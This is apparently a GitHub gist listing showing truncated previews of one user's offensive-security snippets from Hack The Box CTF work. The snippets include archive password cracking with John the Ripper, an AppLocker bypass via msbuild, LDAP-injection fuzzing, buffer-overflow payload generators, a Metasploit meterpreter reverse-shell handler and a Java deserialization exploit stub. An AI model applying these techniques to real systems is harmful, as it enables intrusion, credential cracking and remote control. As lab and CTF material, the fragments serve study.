I hereby claim:
- I am cdowns71 on github.
- I am dualfade (https://keybase.io/dualfade) on keybase.
- I have a public key ASDxw8oJN09Hj6abWb9Vc-BggpenCuRcRRWNa3j1r04UQwo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh | |
#!/bin/bash | |
# 7zip-JTR Decrypt Script | |
# | |
# Clone of JTR Decrypt Scripts by synacl modified for 7zip | |
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/ | |
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ | |
echo "7zip-JTR Decrypt Script"; | |
if [ $# -ne 2 ] |
https://github.com/jpillora/chisel | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
└[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
└[~/go/src/github.com/jpillora/chisel]> go build | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
└[~/go/src/github.com/jpillora/chisel]> ls -l chisel | |
-rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel* | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] |
//AppLocker bypass - Windows 2016 (Build 14393) x64 | |
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml | |
//Microsoft (R) Build Engine version 4.6.1586.0 | |
//[Microsoft .NET Framework, version 4.0.30319.42000] | |
//Copyright (C) Microsoft Corporation. All rights reserved. | |
//Build started 2/5/2019 8:55:26 PM. | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> |
./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080 | |
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 2.3.4 - The Web Fuzzer * | |
******************************************************** | |
Target: http://10.10.10.122/login.php | |
Total requests: 2026 |
/home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john | |
ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9 | |
ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F | |
NOTE: It is assumed that all files in each archive have the same password. | |
If that is not the case, the hash may be uncrackable. To avoid this, use | |
option -o to pick a file at a time. | |
4 CORE OPTION -- | |
NO POINT IN CRUSHING MY 8 CORES INTO THE GROUND -- |
#!usr/bin/env python | |
import struct | |
from pwn import * | |
def gen_payload(start_addr, shellcode): | |
context.arch='amd64' | |
# Opcode for the NOP instruction | |
nop = asm('nop', arch="amd64") | |
nop1 = nop*72 # Create first NOP sled | |
#!/usr/bin/env python | |
from struct import * | |
# bytes 400 -- | |
buf = "" | |
# offset to RIP | |
buf += "A"*72 | |
# overwrite RIP -- |
MODIFIED VEIL HANDLER -- | |
msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc | |
/* | |
use exploit/multi/handler | |
set PAYLOAD windows/x64/meterpreter/reverse_tcp | |
set LHOST 10.10.14.13 | |
set LPORT 3434 | |
set ExitOnSession false | |
exploit -j |
import hashlib | |
import hmac | |
import base64 | |
import requests | |
url = 'http://10.10.10.130:8080/userSubscribe.faces' | |
# re check the payload maybe generate it from kali (ysoserial pipe to base64) and make sure it is java 8 in order for it to work. | |
payload = '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 |